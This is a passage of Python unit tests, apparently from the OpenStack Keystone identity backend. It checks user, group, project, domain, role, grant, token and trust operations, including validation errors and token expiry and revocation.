domain1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain1['id'], domain1)
project1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'domain_id': domain1['id']}
self.identity_man.create_project({}, project1['id'], project1)
user1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'domain_id': domain1['id'], 'password': uuid.uuid4().hex,
'enabled': True}
self.identity_man.create_user({}, user1['id'], user1)
group1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'domain_id': domain1['id'], 'enabled': True}
self.identity_man.create_group({}, group1['id'], group1)
self.identity_api.create_grant(user_id=user1['id'],
project_id=project1['id'],
role_id=role1['id'])
self.identity_api.create_grant(user_id=user1['id'],
domain_id=domain1['id'],
role_id=role1['id'])
self.identity_api.add_user_to_group(user_id=user1['id'],
group_id=group1['id'])
roles_ref = self.identity_api.list_grants(
user_id=user1['id'],
project_id=project1['id'])
self.assertEquals(len(roles_ref), 1)
roles_ref = self.identity_api.list_grants(
user_id=user1['id'],
domain_id=domain1['id'])
self.assertEquals(len(roles_ref), 1)
self.identity_api.check_user_in_group(
user_id=user1['id'],
group_id=group1['id'])
self.identity_api.delete_user(user1['id'])
self.assertRaises(exception.UserNotFound,
self.identity_api.list_grants,
user_id=user1['id'],
project_id=project1['id'])
self.assertRaises(exception.UserNotFound,
self.identity_api.list_grants,
user_id=user1['id'],
domain_id=domain1['id'])
self.assertRaises(exception.NotFound,
self.identity_api.check_user_in_group,
user1['id'],
group1['id'])
def test_delete_group_with_user_project_domain_links(self):
role1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_role(role1['id'], role1)
domain1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain1['id'], domain1)
project1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'domain_id': domain1['id']}
self.identity_man.create_project({}, project1['id'], project1)
user1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'domain_id': domain1['id'], 'password': uuid.uuid4().hex,
'enabled': True}
self.identity_man.create_user({}, user1['id'], user1)
group1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'domain_id': domain1['id'], 'enabled': True}
self.identity_man.create_group({}, group1['id'], group1)
self.identity_api.create_grant(group_id=group1['id'],
project_id=project1['id'],
role_id=role1['id'])
self.identity_api.create_grant(group_id=group1['id'],
domain_id=domain1['id'],
role_id=role1['id'])
self.identity_api.add_user_to_group(user_id=user1['id'],
group_id=group1['id'])
roles_ref = self.identity_api.list_grants(
group_id=group1['id'],
project_id=project1['id'])
self.assertEquals(len(roles_ref), 1)
roles_ref = self.identity_api.list_grants(
group_id=group1['id'],
domain_id=domain1['id'])
self.assertEquals(len(roles_ref), 1)
self.identity_api.check_user_in_group(
user_id=user1['id'],
group_id=group1['id'])
self.identity_api.delete_group(group1['id'])
self.assertRaises(exception.GroupNotFound,
self.identity_api.list_grants,
group_id=group1['id'],
project_id=project1['id'])
self.assertRaises(exception.GroupNotFound,
self.identity_api.list_grants,
group_id=group1['id'],
domain_id=domain1['id'])
self.identity_api.get_user(user1['id'])
def test_delete_domain_with_user_group_project_links(self):
#TODO(chungg):add test case once expected behaviour defined
pass
def test_role_crud(self):
role = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_role(role['id'], role)
role_ref = self.identity_api.get_role(role['id'])
role_ref_dict = dict((x, role_ref[x]) for x in role_ref)
self.assertDictEqual(role_ref_dict, role)
role['name'] = uuid.uuid4().hex
self.identity_api.update_role(role['id'], role)
role_ref = self.identity_api.get_role(role['id'])
role_ref_dict = dict((x, role_ref[x]) for x in role_ref)
self.assertDictEqual(role_ref_dict, role)
self.identity_api.delete_role(role['id'])
self.assertRaises(exception.RoleNotFound,
self.identity_api.get_role,
role['id'])
def test_update_role_404(self):
role = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.assertRaises(exception.RoleNotFound,
self.identity_api.update_role,
role['id'],
role)
def test_add_user_to_project(self):
self.identity_api.add_user_to_project(self.tenant_baz['id'],
self.user_foo['id'])
tenants = self.identity_api.get_projects_for_user(self.user_foo['id'])
self.assertIn(self.tenant_baz['id'], tenants)
def test_add_user_to_project_404(self):
self.assertRaises(exception.ProjectNotFound,
self.identity_api.add_user_to_project,
uuid.uuid4().hex,
self.user_foo['id'])
self.assertRaises(exception.UserNotFound,
self.identity_api.add_user_to_project,
self.tenant_bar['id'],
uuid.uuid4().hex)
def test_remove_user_from_project(self):
self.identity_api.add_user_to_project(self.tenant_baz['id'],
self.user_foo['id'])
self.identity_api.remove_user_from_project(self.tenant_baz['id'],
self.user_foo['id'])
tenants = self.identity_api.get_projects_for_user(self.user_foo['id'])
self.assertNotIn(self.tenant_baz['id'], tenants)
def test_remove_user_from_project_404(self):
self.assertRaises(exception.ProjectNotFound,
self.identity_api.remove_user_from_project,
uuid.uuid4().hex,
self.user_foo['id'])
self.assertRaises(exception.UserNotFound,
self.identity_api.remove_user_from_project,
self.tenant_bar['id'],
uuid.uuid4().hex)
self.assertRaises(exception.NotFound,
self.identity_api.remove_user_from_project,
self.tenant_baz['id'],
self.user_foo['id'])
def test_get_projects_for_user_404(self):
self.assertRaises(exception.UserNotFound,
self.identity_api.get_projects_for_user,
uuid.uuid4().hex)
def test_update_project_404(self):
self.assertRaises(exception.ProjectNotFound,
self.identity_api.update_project,
uuid.uuid4().hex,
dict())
def test_delete_project_404(self):
self.assertRaises(exception.ProjectNotFound,
self.identity_api.delete_project,
uuid.uuid4().hex)
def test_update_user_404(self):
user_id = uuid.uuid4().hex
self.assertRaises(exception.UserNotFound,
self.identity_api.update_user,
user_id,
{'id': user_id})
def test_delete_user_with_project_association(self):
user = {'id': uuid.uuid4().hex,
'name': uuid.uuid4().hex,
'domain_id': DEFAULT_DOMAIN_ID,
'password': uuid.uuid4().hex}
self.identity_api.create_user(user['id'], user)
self.identity_api.add_user_to_project(self.tenant_bar['id'],
user['id'])
self.identity_api.delete_user(user['id'])
self.assertRaises(exception.UserNotFound,
self.identity_api.get_projects_for_user,
user['id'])
def test_delete_user_with_project_roles(self):
user = {'id': uuid.uuid4().hex,
'name': uuid.uuid4().hex,
'domain_id': DEFAULT_DOMAIN_ID,
'password': uuid.uuid4().hex}
self.identity_api.create_user(user['id'], user)
self.identity_api.add_role_to_user_and_project(
user['id'],
self.tenant_bar['id'],
self.role_member['id'])
self.identity_api.delete_user(user['id'])
self.assertRaises(exception.UserNotFound,
self.identity_api.get_projects_for_user,
user['id'])
def test_delete_user_404(self):
self.assertRaises(exception.UserNotFound,
self.identity_api.delete_user,
uuid.uuid4().hex)
def test_delete_role_404(self):
self.assertRaises(exception.RoleNotFound,
self.identity_api.delete_role,
uuid.uuid4().hex)
def test_create_project_long_name_fails(self):
tenant = {'id': 'fake1', 'name': 'a' * 65,
'domain_id': DEFAULT_DOMAIN_ID}
self.assertRaises(exception.ValidationError,
self.identity_man.create_project, {},
tenant['id'],
tenant)
def test_create_project_blank_name_fails(self):
tenant = {'id': 'fake1', 'name': '',
'domain_id': DEFAULT_DOMAIN_ID}
self.assertRaises(exception.ValidationError,
self.identity_man.create_project, {},
tenant['id'],
tenant)
def test_create_project_invalid_name_fails(self):
tenant = {'id': 'fake1', 'name': None,
'domain_id': DEFAULT_DOMAIN_ID}
self.assertRaises(exception.ValidationError,
self.identity_man.create_project, {},
tenant['id'],
tenant)
tenant = {'id': 'fake1', 'name': 123,
'domain_id': DEFAULT_DOMAIN_ID}
self.assertRaises(exception.ValidationError,
self.identity_man.create_project, {},
tenant['id'],
tenant)
def test_update_project_blank_name_fails(self):
tenant = {'id': 'fake1', 'name': 'fake1',
'domain_id': DEFAULT_DOMAIN_ID}
self.identity_man.create_project({}, 'fake1', tenant)
tenant['name'] = ''
self.assertRaises(exception.ValidationError,
self.identity_api.update_project,
tenant['id'],
tenant)
def test_update_project_long_name_fails(self):
tenant = {'id': 'fake1', 'name': 'fake1',
'domain_id': DEFAULT_DOMAIN_ID}
self.identity_man.create_project({}, 'fake1', tenant)
tenant['name'] = 'a' * 65
self.assertRaises(exception.ValidationError,
self.identity_api.update_project,
tenant['id'],
tenant)
def test_update_project_invalid_name_fails(self):
tenant = {'id': 'fake1', 'name': 'fake1',
'domain_id': DEFAULT_DOMAIN_ID}
self.identity_man.create_project({}, 'fake1', tenant)
tenant['name'] = None
self.assertRaises(exception.ValidationError,
self.identity_api.update_project,
tenant['id'],
tenant)
tenant['name'] = 123
self.assertRaises(exception.ValidationError,
self.identity_api.update_project,
tenant['id'],
tenant)
def test_create_user_long_name_fails(self):
user = {'id': 'fake1', 'name': 'a' * 65,
'domain_id': DEFAULT_DOMAIN_ID}
self.assertRaises(exception.ValidationError,
self.identity_man.create_user, {},
'fake1',
user)
def test_create_user_blank_name_fails(self):
user = {'id': 'fake1', 'name': '',
'domain_id': DEFAULT_DOMAIN_ID}
self.assertRaises(exception.ValidationError,
self.identity_man.create_user, {},
'fake1',
user)
def test_create_user_invalid_name_fails(self):
user = {'id': 'fake1', 'name': None,
'domain_id': DEFAULT_DOMAIN_ID}
self.assertRaises(exception.ValidationError,
self.identity_man.create_user, {},
'fake1',
user)
user = {'id': 'fake1', 'name': 123,
'domain_id': DEFAULT_DOMAIN_ID}
self.assertRaises(exception.ValidationError,
self.identity_man.create_user, {},
'fake1',
user)
def test_update_user_long_name_fails(self):
user = {'id': 'fake1', 'name': 'fake1',
'domain_id': DEFAULT_DOMAIN_ID}
self.identity_man.create_user({}, 'fake1', user)
user['name'] = 'a' * 65
self.assertRaises(exception.ValidationError,
self.identity_api.update_user,
'fake1',
user)
def test_update_user_blank_name_fails(self):
user = {'id': 'fake1', 'name': 'fake1',
'domain_id': DEFAULT_DOMAIN_ID}
self.identity_man.create_user({}, 'fake1', user)
user['name'] = ''
self.assertRaises(exception.ValidationError,
self.identity_api.update_user,
'fake1',
user)
def test_update_user_invalid_name_fails(self):
user = {'id': 'fake1', 'name': 'fake1',
'domain_id': DEFAULT_DOMAIN_ID}
self.identity_man.create_user({}, 'fake1', user)
user['name'] = None
self.assertRaises(exception.ValidationError,
self.identity_api.update_user,
'fake1',
user)
user['name'] = 123
self.assertRaises(exception.ValidationError,
self.identity_api.update_user,
'fake1',
user)
def test_list_users(self):
users = self.identity_api.list_users()
for test_user in default_fixtures.USERS:
self.assertTrue(x for x in users if x['id'] == test_user['id'])
def test_list_groups(self):
group1 = {'id': uuid.uuid4().hex, 'domain_id': uuid.uuid4().hex,
'name': uuid.uuid4().hex}
group2 = {'id': uuid.uuid4().hex, 'domain_id': uuid.uuid4().hex,
'name': uuid.uuid4().hex}
self.identity_man.create_group({}, group1['id'], group1)
self.identity_man.create_group({}, group2['id'], group2)
groups = self.identity_api.list_groups()
self.assertEquals(len(groups), 2)
group_ids = []
for group in groups:
group_ids.append(group.get('id'))
self.assertIn(group1['id'], group_ids)
self.assertIn(group2['id'], group_ids)
def test_list_domains(self):
domain1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
domain2 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain1['id'], domain1)
self.identity_api.create_domain(domain2['id'], domain2)
domains = self.identity_api.list_domains()
self.assertEquals(len(domains), 3)
domain_ids = []
for domain in domains:
domain_ids.append(domain.get('id'))
self.assertIn(DEFAULT_DOMAIN_ID, domain_ids)
self.assertIn(domain1['id'], domain_ids)
self.assertIn(domain2['id'], domain_ids)
def test_list_projects(self):
projects = self.identity_api.list_projects()
self.assertEquals(len(projects), 3)
project_ids = []
for project in projects:
project_ids.append(project.get('id'))
self.assertIn(self.tenant_bar['id'], project_ids)
self.assertIn(self.tenant_baz['id'], project_ids)
def test_list_roles(self):
roles = self.identity_api.list_roles()
for test_role in default_fixtures.ROLES:
self.assertTrue(x for x in roles if x['id'] == test_role['id'])
def test_delete_project_with_role_assignments(self):
tenant = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'domain_id': DEFAULT_DOMAIN_ID}
self.identity_api.create_project(tenant['id'], tenant)
self.identity_api.add_role_to_user_and_project(
self.user_foo['id'], tenant['id'], 'member')
self.identity_api.delete_project(tenant['id'])
self.assertRaises(exception.NotFound,
self.identity_api.get_project,
tenant['id'])
def test_delete_role_check_role_grant(self):
role = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
alt_role = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_role(role['id'], role)
self.identity_api.create_role(alt_role['id'], alt_role)
self.identity_api.add_role_to_user_and_project(
self.user_foo['id'], self.tenant_bar['id'], role['id'])
self.identity_api.add_role_to_user_and_project(
self.user_foo['id'], self.tenant_bar['id'], alt_role['id'])
self.identity_api.delete_role(role['id'])
roles_ref = self.identity_api.get_roles_for_user_and_project(
self.user_foo['id'], self.tenant_bar['id'])
self.assertNotIn(role['id'], roles_ref)
self.assertIn(alt_role['id'], roles_ref)
def test_create_project_doesnt_modify_passed_in_dict(self):
new_project = {'id': 'tenant_id', 'name': uuid.uuid4().hex,
'domain_id': DEFAULT_DOMAIN_ID}
original_project = new_project.copy()
self.identity_man.create_project({}, 'tenant_id', new_project)
self.assertDictEqual(original_project, new_project)
def test_create_user_doesnt_modify_passed_in_dict(self):
new_user = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'password': uuid.uuid4().hex,
'domain_id': DEFAULT_DOMAIN_ID}
original_user = new_user.copy()
self.identity_man.create_user({}, 'user_id', new_user)
self.assertDictEqual(original_user, new_user)
def test_update_user_enable(self):
user = {'id': 'fake1', 'name': 'fake1', 'enabled': True,
'domain_id': DEFAULT_DOMAIN_ID}
self.identity_api.create_user('fake1', user)
user_ref = self.identity_api.get_user('fake1')
self.assertEqual(user_ref['enabled'], True)
user['enabled'] = False
self.identity_api.update_user('fake1', user)
user_ref = self.identity_api.get_user('fake1')
self.assertEqual(user_ref['enabled'], user['enabled'])
user['enabled'] = True
self.identity_api.update_user('fake1', user)
user_ref = self.identity_api.get_user('fake1')
self.assertEqual(user_ref['enabled'], user['enabled'])
def test_update_project_enable(self):
tenant = {'id': 'fake1', 'name': 'fake1', 'enabled': True,
'domain_id': DEFAULT_DOMAIN_ID}
self.identity_api.create_project('fake1', tenant)
tenant_ref = self.identity_api.get_project('fake1')
self.assertEqual(tenant_ref['enabled'], True)
tenant['enabled'] = False
self.identity_api.update_project('fake1', tenant)
tenant_ref = self.identity_api.get_project('fake1')
self.assertEqual(tenant_ref['enabled'], tenant['enabled'])
tenant['enabled'] = True
self.identity_api.update_project('fake1', tenant)
tenant_ref = self.identity_api.get_project('fake1')
self.assertEqual(tenant_ref['enabled'], tenant['enabled'])
def test_add_user_to_group(self):
domain = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain['id'], domain)
new_group = {'id': uuid.uuid4().hex, 'domain_id': uuid.uuid4().hex,
'name': uuid.uuid4().hex}
self.identity_man.create_group({}, new_group['id'], new_group)
new_user = {'id': uuid.uuid4().hex, 'name': 'new_user',
'password': uuid.uuid4().hex, 'enabled': True,
'domain_id': domain['id']}
self.identity_man.create_user({}, new_user['id'], new_user)
self.identity_api.add_user_to_group(new_user['id'],
new_group['id'])
groups = self.identity_api.list_groups_for_user(new_user['id'])
found = False
for x in groups:
if (x['id'] == new_group['id']):
found = True
self.assertTrue(found)
def test_add_user_to_group_404(self):
domain = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain['id'], domain)
new_user = {'id': uuid.uuid4().hex, 'name': 'new_user',
'password': uuid.uuid4().hex, 'enabled': True,
'domain_id': domain['id']}
self.identity_man.create_user({}, new_user['id'], new_user)
self.assertRaises(exception.GroupNotFound,
self.identity_api.add_user_to_group,
new_user['id'],
uuid.uuid4().hex)
new_group = {'id': uuid.uuid4().hex, 'domain_id': uuid.uuid4().hex,
'name': uuid.uuid4().hex}
self.identity_man.create_group({}, new_group['id'], new_group)
self.assertRaises(exception.UserNotFound,
self.identity_api.add_user_to_group,
uuid.uuid4().hex,
new_group['id'])
def test_check_user_in_group(self):
domain = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain['id'], domain)
new_group = {'id': uuid.uuid4().hex, 'domain_id': uuid.uuid4().hex,
'name': uuid.uuid4().hex}
self.identity_man.create_group({}, new_group['id'], new_group)
new_user = {'id': uuid.uuid4().hex, 'name': 'new_user',
'password': uuid.uuid4().hex, 'enabled': True,
'domain_id': domain['id']}
self.identity_man.create_user({}, new_user['id'], new_user)
self.identity_api.add_user_to_group(new_user['id'],
new_group['id'])
self.identity_api.check_user_in_group(new_user['id'], new_group['id'])
def test_check_user_not_in_group(self):
new_group = {'id': uuid.uuid4().hex, 'domain_id': uuid.uuid4().hex,
'name': uuid.uuid4().hex}
self.identity_man.create_group({}, new_group['id'], new_group)
self.assertRaises(exception.UserNotFound,
self.identity_api.check_user_in_group,
uuid.uuid4().hex,
new_group['id'])
def test_list_users_in_group(self):
domain = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain['id'], domain)
new_group = {'id': uuid.uuid4().hex, 'domain_id': uuid.uuid4().hex,
'name': uuid.uuid4().hex}
self.identity_man.create_group({}, new_group['id'], new_group)
new_user = {'id': uuid.uuid4().hex, 'name': 'new_user',
'password': uuid.uuid4().hex, 'enabled': True,
'domain_id': domain['id']}
self.identity_man.create_user({}, new_user['id'], new_user)
self.identity_api.add_user_to_group(new_user['id'],
new_group['id'])
user_refs = self.identity_api.list_users_in_group(new_group['id'])
found = False
for x in user_refs:
if (x['id'] == new_user['id']):
found = True
self.assertTrue(found)
def test_remove_user_from_group(self):
domain = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain['id'], domain)
new_group = {'id': uuid.uuid4().hex, 'domain_id': uuid.uuid4().hex,
'name': uuid.uuid4().hex}
self.identity_man.create_group({}, new_group['id'], new_group)
new_user = {'id': uuid.uuid4().hex, 'name': 'new_user',
'password': uuid.uuid4().hex, 'enabled': True,
'domain_id': domain['id']}
self.identity_man.create_user({}, new_user['id'], new_user)
self.identity_api.add_user_to_group(new_user['id'],
new_group['id'])
agroups = self.identity_api.list_groups_for_user(new_user['id'])
self.identity_api.remove_user_from_group(new_user['id'],
new_group['id'])
groups = self.identity_api.list_groups_for_user(new_user['id'])
for x in groups:
self.assertFalse(x['id'] == new_group['id'])
def test_remove_user_from_group_404(self):
domain = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain['id'], domain)
new_user = {'id': uuid.uuid4().hex, 'name': 'new_user',
'password': uuid.uuid4().hex, 'enabled': True,
'domain_id': domain['id']}
self.identity_man.create_user({}, new_user['id'], new_user)
new_group = {'id': uuid.uuid4().hex, 'domain_id': uuid.uuid4().hex,
'name': uuid.uuid4().hex}
self.identity_man.create_group({}, new_group['id'], new_group)
self.assertRaises(exception.NotFound,
self.identity_api.remove_user_from_group,
new_user['id'],
uuid.uuid4().hex)
self.assertRaises(exception.NotFound,
self.identity_api.remove_user_from_group,
uuid.uuid4().hex,
new_group['id'])
self.assertRaises(exception.NotFound,
self.identity_api.remove_user_from_group,
uuid.uuid4().hex,
uuid.uuid4().hex)
def test_group_crud(self):
group = {'id': uuid.uuid4().hex, 'domain_id': uuid.uuid4().hex,
'name': uuid.uuid4().hex}
self.identity_man.create_group({}, group['id'], group)
group_ref = self.identity_api.get_group(group['id'])
self.assertDictContainsSubset(group_ref, group)
group['name'] = uuid.uuid4().hex
self.identity_api.update_group(group['id'], group)
group_ref = self.identity_api.get_group(group['id'])
self.assertDictContainsSubset(group_ref, group)
self.identity_api.delete_group(group['id'])
self.assertRaises(exception.GroupNotFound,
self.identity_api.get_group,
group['id'])
def test_create_duplicate_group_name_fails(self):
group1 = {'id': uuid.uuid4().hex, 'domain_id': DEFAULT_DOMAIN_ID,
'name': uuid.uuid4().hex}
group2 = {'id': uuid.uuid4().hex, 'domain_id': DEFAULT_DOMAIN_ID,
'name': group1['name']}
self.identity_man.create_group({}, group1['id'], group1)
self.assertRaises(exception.Conflict,
self.identity_man.create_group, {},
group2['id'], group2)
def test_create_duplicate_group_name_in_different_domains(self):
new_domain = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(new_domain['id'], new_domain)
group1 = {'id': uuid.uuid4().hex, 'domain_id': DEFAULT_DOMAIN_ID,
'name': uuid.uuid4().hex}
group2 = {'id': uuid.uuid4().hex, 'domain_id': new_domain['id'],
'name': group1['name']}
self.identity_man.create_group({}, group1['id'], group1)
self.identity_man.create_group({}, group2['id'], group2)
def test_move_group_between_domains(self):
domain1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain1['id'], domain1)
domain2 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain2['id'], domain2)
group = {'id': uuid.uuid4().hex,
'name': uuid.uuid4().hex,
'domain_id': domain1['id']}
self.identity_man.create_group({}, group['id'], group)
group['domain_id'] = domain2['id']
self.identity_api.update_group(group['id'], group)
def test_move_group_between_domains_with_clashing_names_fails(self):
domain1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain1['id'], domain1)
domain2 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain2['id'], domain2)
# First, create a group in domain1
group1 = {'id': uuid.uuid4().hex,
'name': uuid.uuid4().hex,
'domain_id': domain1['id']}
self.identity_man.create_group({}, group1['id'], group1)
# Now create a group in domain2 with a potentially clashing
# name - which should work since we have domain separation
group2 = {'id': uuid.uuid4().hex,
'name': group1['name'],
'domain_id': domain2['id']}
self.identity_man.create_group({}, group2['id'], group2)
# Now try and move group1 into the 2nd domain - which should
# fail since the names clash
group1['domain_id'] = domain2['id']
self.assertRaises(exception.Conflict,
self.identity_api.update_group,
group1['id'],
group1)
def test_project_crud(self):
project = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'domain_id': uuid.uuid4().hex}
self.identity_man.create_project({}, project['id'], project)
project_ref = self.identity_api.get_project(project['id'])
self.assertDictContainsSubset(project_ref, project)
project['name'] = uuid.uuid4().hex
self.identity_api.update_project(project['id'], project)
project_ref = self.identity_api.get_project(project['id'])
self.assertDictContainsSubset(project_ref, project)
self.identity_api.delete_project(project['id'])
self.assertRaises(exception.ProjectNotFound,
self.identity_api.get_project,
project['id'])
def test_domain_crud(self):
domain = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'enabled': True}
self.identity_api.create_domain(domain['id'], domain)
domain_ref = self.identity_api.get_domain(domain['id'])
self.assertDictEqual(domain_ref, domain)
domain['name'] = uuid.uuid4().hex
self.identity_api.update_domain(domain['id'], domain)
domain_ref = self.identity_api.get_domain(domain['id'])
self.assertDictEqual(domain_ref, domain)
self.identity_api.delete_domain(domain['id'])
self.assertRaises(exception.DomainNotFound,
self.identity_api.get_domain,
domain['id'])
def test_user_crud(self):
user = {'domain_id': uuid.uuid4().hex, 'id': uuid.uuid4().hex,
'name': uuid.uuid4().hex, 'password': 'passw0rd'}
self.identity_api.create_user(user['id'], user)
user_ref = self.identity_api.get_user(user['id'])
del user['password']
user_ref_dict = dict((x, user_ref[x]) for x in user_ref)
self.assertDictContainsSubset(user_ref_dict, user)
user['password'] = uuid.uuid4().hex
self.identity_api.update_user(user['id'], user)
user_ref = self.identity_api.get_user(user['id'])
del user['password']
user_ref_dict = dict((x, user_ref[x]) for x in user_ref)
self.assertDictContainsSubset(user_ref_dict, user)
self.identity_api.delete_user(user['id'])
self.assertRaises(exception.UserNotFound,
self.identity_api.get_user,
user['id'])
def test_list_user_projects(self):
user1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'password': uuid.uuid4().hex, 'domain_id': uuid.uuid4().hex,
'enabled': True}
self.identity_man.create_user({}, user1['id'], user1)
user_projects = self.identity_api.list_user_projects(user1['id'])
self.assertEquals(len(user_projects), 0)
self.identity_api.create_grant(user_id=user1['id'],
project_id=self.tenant_bar['id'],
role_id=self.role_member['id'])
self.identity_api.create_grant(user_id=user1['id'],
project_id=self.tenant_baz['id'],
role_id=self.role_member['id'])
user_projects = self.identity_api.list_user_projects(user1['id'])
self.assertEquals(len(user_projects), 2)
class TokenTests(object):
def test_token_crud(self):
token_id = uuid.uuid4().hex
data = {'id': token_id, 'a': 'b',
'trust_id': None,
'user': {'id': 'testuserid'}}
data_ref = self.token_api.create_token(token_id, data)
expires = data_ref.pop('expires')
data_ref.pop('user_id')
self.assertTrue(isinstance(expires, datetime.datetime))
self.assertDictEqual(data_ref, data)
new_data_ref = self.token_api.get_token(token_id)
expires = new_data_ref.pop('expires')
new_data_ref.pop('user_id')
self.assertTrue(isinstance(expires, datetime.datetime))
self.assertEquals(new_data_ref, data)
self.token_api.delete_token(token_id)
self.assertRaises(exception.TokenNotFound,
self.token_api.get_token, token_id)
self.assertRaises(exception.TokenNotFound,
self.token_api.delete_token, token_id)
def create_token_sample_data(self, tenant_id=None, trust_id=None):
token_id = uuid.uuid4().hex
data = {'id': token_id, 'a': 'b',
'user': {'id': 'testuserid'}}
if tenant_id is not None:
data['tenant'] = {'id': tenant_id, 'name': tenant_id}
if trust_id is not None:
data['trust_id'] = trust_id
self.token_api.create_token(token_id, data)
return token_id
def test_token_list(self):
tokens = self.token_api.list_tokens('testuserid')
self.assertEquals(len(tokens), 0)
token_id1 = self.create_token_sample_data()
tokens = self.token_api.list_tokens('testuserid')
self.assertEquals(len(tokens), 1)
self.assertIn(token_id1, tokens)
token_id2 = self.create_token_sample_data()
tokens = self.token_api.list_tokens('testuserid')
self.assertEquals(len(tokens), 2)
self.assertIn(token_id2, tokens)
self.assertIn(token_id1, tokens)
self.token_api.delete_token(token_id1)
tokens = self.token_api.list_tokens('testuserid')
self.assertIn(token_id2, tokens)
self.assertNotIn(token_id1, tokens)
self.token_api.delete_token(token_id2)
tokens = self.token_api.list_tokens('testuserid')
self.assertNotIn(token_id2, tokens)
self.assertNotIn(token_id1, tokens)
# tenant-specific tokens
tenant1 = uuid.uuid4().hex
tenant2 = uuid.uuid4().hex
token_id3 = self.create_token_sample_data(tenant_id=tenant1)
token_id4 = self.create_token_sample_data(tenant_id=tenant2)
tokens = self.token_api.list_tokens('testuserid')
self.assertEquals(len(tokens), 2)
self.assertNotIn(token_id1, tokens)
self.assertNotIn(token_id2, tokens)
self.assertIn(token_id3, tokens)
self.assertIn(token_id4, tokens)
tokens = self.token_api.list_tokens('testuserid', tenant2)
self.assertEquals(len(tokens), 1)
self.assertNotIn(token_id1, tokens)
self.assertNotIn(token_id2, tokens)
self.assertNotIn(token_id3, tokens)
self.assertIn(token_id4, tokens)
def test_token_list_trust(self):
trust_id = uuid.uuid4().hex
token_id5 = self.create_token_sample_data(trust_id=trust_id)
tokens = self.token_api.list_tokens('testuserid', trust_id=trust_id)
self.assertEquals(len(tokens), 1)
self.assertIn(token_id5, tokens)
def test_get_token_404(self):
self.assertRaises(exception.TokenNotFound,
self.token_api.get_token,
uuid.uuid4().hex)
self.assertRaises(exception.TokenNotFound,
self.token_api.get_token,
None)
def test_delete_token_404(self):
self.assertRaises(exception.TokenNotFound,
self.token_api.delete_token,
uuid.uuid4().hex)
def test_expired_token(self):
token_id = uuid.uuid4().hex
expire_time = timeutils.utcnow() - datetime.timedelta(minutes=1)
data = {'id_hash': token_id, 'id': token_id, 'a': 'b',
'expires': expire_time,
'trust_id': None,
'user': {'id': 'testuserid'}}
data_ref = self.token_api.create_token(token_id, data)
data_ref.pop('user_id')
self.assertDictEqual(data_ref, data)
self.assertRaises(exception.TokenNotFound,
self.token_api.get_token, token_id)
def test_null_expires_token(self):
token_id = uuid.uuid4().hex
data = {'id': token_id, 'id_hash': token_id, 'a': 'b', 'expires': None,
'user': {'id': 'testuserid'}}
data_ref = self.token_api.create_token(token_id, data)
self.assertIsNotNone(data_ref['expires'])
new_data_ref = self.token_api.get_token(token_id)
self.assertEqual(data_ref, new_data_ref)
def check_list_revoked_tokens(self, token_ids):
revoked_ids = [x['id'] for x in self.token_api.list_revoked_tokens()]
for token_id in token_ids:
self.assertIn(token_id, revoked_ids)
def delete_token(self):
token_id = uuid.uuid4().hex
data = {'id_hash': token_id, 'id': token_id, 'a': 'b',
'user': {'id': 'testuserid'}}
data_ref = self.token_api.create_token(token_id, data)
self.token_api.delete_token(token_id)
self.assertRaises(
exception.TokenNotFound,
self.token_api.get_token,
data_ref['id'])
self.assertRaises(
exception.TokenNotFound,
self.token_api.delete_token,
data_ref['id'])
return token_id
def test_list_revoked_tokens_returns_empty_list(self):
revoked_ids = [x['id'] for x in self.token_api.list_revoked_tokens()]
self.assertEqual(revoked_ids, [])
def test_list_revoked_tokens_for_single_token(self):
self.check_list_revoked_tokens([self.delete_token()])
def test_list_revoked_tokens_for_multiple_tokens(self):
self.check_list_revoked_tokens([self.delete_token()
for x in xrange(2)])
class TrustTests(object):
def create_sample_trust(self, new_id):
self.trustor = self.user_foo
self.trustee = self.user_two
trust_data = (self.trust_api.create_trust
(new_id,
{'trustor_user_id': self.trustor['id'],
'trustee_user_id': self.user_two['id'],
'project_id': self.tenant_bar['id'],
'expires_at': timeutils.
parse_isotime('2031-02-18T18:10:00Z'),
'impersonation': True},
roles=[{"id": "member"},
{"id": "other"},
{"id": "browser"}]))
return trust_data
def test_delete_trust(self):
new_id = uuid.uuid4().hex
trust_data = self.create_sample_trust(new_id)
trust_id = trust_data['id']
